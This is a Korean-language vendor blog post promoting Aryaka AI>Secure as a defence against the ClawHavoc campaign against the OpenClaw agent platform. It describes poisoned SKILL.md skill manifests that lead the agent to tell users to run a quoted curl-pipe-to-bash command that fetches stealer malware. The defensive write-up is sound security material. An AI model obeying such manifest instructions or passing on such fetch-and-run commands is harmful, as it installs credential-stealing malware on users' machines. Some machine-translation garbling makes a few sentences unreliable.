Blog 2 Securing OpenClaw Against Banner

2026년 2월 현재, 오픈클로(이전의 클로봇과 몰트봇)는 자율 AI 에이전트를 위한 인기 있는 플랫폼입니다. AI가 파일 시스템과 터미널에 직접 액세스할 수 있는 ‘소버린’ 아키텍처는 공격 표면을 크게 증가시켜 위험성을 높이며, 특히 수천 개의 배포를 잠재적 침해에 노출시킨 ClawHavoc 공급망 캠페인에서 가장 잘 설명됩니다.

이 문서에서는 OpenClaw의 취약점을 검토하고 Aryaka AI>Secure가 어떻게 강력하고 다층적인 위험 완화 기능을 제공하는지 설명합니다.

OpenClaw 취약점 및 ClawHavoc 컨텍스트

OpenClaw는 세 가지 주요 요인으로 인해 취약합니다:

  • 시스템 수준 액세스: 상담원은 셸 명령을 실행하고 자격 증명에 액세스할 수 있습니다.
  • 신뢰할 수 없는 수집: 에이전트가 타사 콘텐츠를 처리하여 프롬프트 인젝션에 노출됩니다.
  • 자율적 커뮤니케이션: 에이전트는 감독 없이도 외부로 데이터를 전송할 수 있습니다.

클로해복은 이러한 생태계를 악용한 공급망 공격입니다. 2026년 2월, 연구원들은 유용한 도구로 위장했지만 실제로는 디지털 신원을 훔치는 악의적인 클로허브 기술을 약 12% 발견했습니다.

클로해복의 작동 방식: 감염의 해부학

클로해복은 OpenClaw가 명령을 수집하는 방식을 악용하는 상태 저장형 사회 공학 공격입니다. 반복 가능하고 매우 효과적인 킬 체인을 따릅니다:

  • 1단계: 포이즌드 매니페스트(SKILL.md): 공격자가 ClawHub에 스킬을 업로드합니다. 공격의 핵심은 SKILL.md 파일입니다. 이 파일에는 에이전트(및 사용자)에게 툴을 ‘초기화’하기 위해 특정 스크립트를 실행해야 함을 알려주는 ‘전제 조건’ 섹션이 포함되어 있습니다.
  • 2단계: LLM을 통한 소셜 엔지니어링: 에이전트에게 스킬 사용을 요청하면, 에이전트는 악성 SKILL.md를 컨텍스트에 맞게 읽습니다. 그런 다음 LLM은 도움이 될 만한 답변을 생성합니다: “이 기능을 사용하려면 터미널에서 다음 명령을 실행하세요: curl -sL https://glot.io/raw/snippet | bash.”
  • 3단계: 멀웨어 페이로드 전달: 사용자가 명령을 실행하면 2단계 페이로드(일반적으로 Atomic Stealer(AMOS) 또는 키로거)를 다운로드합니다. 이 멀웨어는 브라우저 쿠키, 키체인, OpenClaw 환경 파일에서 API 키와 암호화폐 지갑을 훔칩니다.

아리아카 AI 사용>보안을 통한 ClawHavoc 차단

딥 패킷, AI 인식 MITM 프록시인 Aryaka AI>클라우해복 공격 체인의 모든 단계에서 트래픽을 차단합니다.

방법 1: 악성 스킬 다운로드 차단하기

사용자가 클로허브 설치를 실행하면 AI>Secure가 레지스트리에서 HTTPS 트래픽을 복호화합니다.

  • 보호: 단순히 파일만 보는 것이 아니라 SKILL.md의 마크다운 콘텐츠를 분석합니다. 시맨틱 검사를 사용하여 숨겨진 셸 명령이나 ClawHavoc 캠페인에 사용된 알려진 스니펫 공유 사이트에 대한 링크와 같은 ‘독성 지침’을 식별합니다.
  • 결과: 네트워크 엣지에서 다운로드를 차단하여 악성 명령이 에이전트의 메모리에 도달하는 것을 방지합니다.

방법 2: 응답 시맨틱 필터링(인스트럭션 방어)

나쁜 스킬이 이미 머신에 있는 경우, AI>보안은 LLM의 출력을 검사하여 두 번째 방어 계층을 제공합니다.

  • 보호: LLM이 사용자에게 “도구를 활성화하려면 이 스크립트를 실행하라”고 지시하면 AI>Secure의 시맨틱 엔진은 이를 “인스톨러 사기”로 인식합니다. AI가 사람을 속여 위험한 행동을 하도록 조작하고 있음을 식별합니다.
  • 결과: 프록시가 채팅 스트림에서 명령을 삭제하거나 메시지를 완전히 차단하여 사용자 인터페이스에서 보안 경고로 대체합니다.

방법 3: 선제적 URL 필터링 및 SWG(페이로드 방어)

사용자가 악성 컬 명령을 수동으로 실행하거나 ‘필수’ ZIP을 다운로드하려고 시도하면 AI>Secure의 보안 웹 게이트웨이(SWG) 기능이 개입합니다.

  • 보호: AI>Secure는 실시간 URL 인텔리전스 피드를 활용하여 피싱 도메인과 멀웨어 호스팅 인프라를 추적합니다.
  • 결과: 에이전트 또는 사용자가 멀웨어 페이로드를 호스팅하는 특정 URL(예: glot.io 또는 webhook.site)에 접속하려고 하면 프록시는 해당 대상을 “악성” 또는 “고위험”으로 식별하고 요청을 즉시 차단합니다. 이렇게 하면 실제 멀웨어가 가져오는 것을 방지할 수 있습니다.

방법 4: 런타임 도구 및 데이터 잠금

멀웨어가 실행되는 경우, AI>Secure가 데이터의 최종 게이트키퍼 역할을 합니다.

  • 보호: MCP(모델 컨텍스트 프로토콜) 호출을 이해합니다. 감염된 에이전트가 셸 명령을 실행하여 데이터를 유출하려고 시도하면 AI>Secure가 비정상적인 대상을 식별합니다.
  • 결과: 차세대 DLP(데이터 손실 방지)가 모든 아웃바운드 데이터에서 ‘비밀'(API 키, SSH 헤더)을 검색합니다. 개인 자격 증명이 네트워크를 떠나는 것을 감지하면 세션을 종료하고 보안 팀에 알립니다.

결론

클라우해복 사태는 자율 에이전트의 경우 프롬프트와 스킬 매니페스트가 새로운 경계라는 것을 증명합니다. Aryaka AI>Secure와 같은 AI 중심 프록시를 활용하면 OpenClaw 에이전트가 공격자를 위한 게이트웨이가 아닌 생산성을 위한 도구로 유지될 수 있습니다.